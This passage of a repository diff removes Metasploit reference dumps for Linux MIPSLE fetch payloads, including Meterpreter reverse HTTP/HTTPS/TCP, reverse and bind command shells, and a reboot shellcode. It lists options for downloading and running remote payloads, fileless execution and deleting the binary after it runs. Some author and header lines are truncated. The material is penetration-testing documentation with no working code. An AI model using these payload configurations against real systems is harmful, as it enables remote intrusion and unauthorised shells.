EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,104 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/mipsle/meterpreter_reverse_http:
=========================
ok@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME gfkVVWTotp no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,106 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
B
Evasion options for payload/cmd/linux/http/mipsle/meterpreter_reverse_https:
=========================
@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME oKPKrTwiNTi no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,97 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME cUPPonWYqDQ no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,68 +0,0 @@
Name: HTTP Fetch, Linux Reboot
Module: payload/cmd/linux/http/mipsle/reboot
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Michael Messner <devnull@s3cur1ty.de>
rigan - <imrigan@gmail.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME HqyjVOMSY no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
A very small shellcode for rebooting the system.
This payload is sometimes helpful for testing purposes.
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,91 +0,0 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager
Module: payload/cmd/linux/http/mipsle/shell/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
juan vazquez <juan.vazquez@metasploit.com>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME fHMIGJaY no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Spawn a command shell (staged).
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,74 +0,0 @@
Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline
Module: payload/cmd/linux/http/mipsle/shell_bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
scut
vaicebine
Vlatko Kosturjak
juan vazquez <juan.vazquez@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME buADmLwtKq no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module

Some files were not shown because too many files have changed in this diff Show More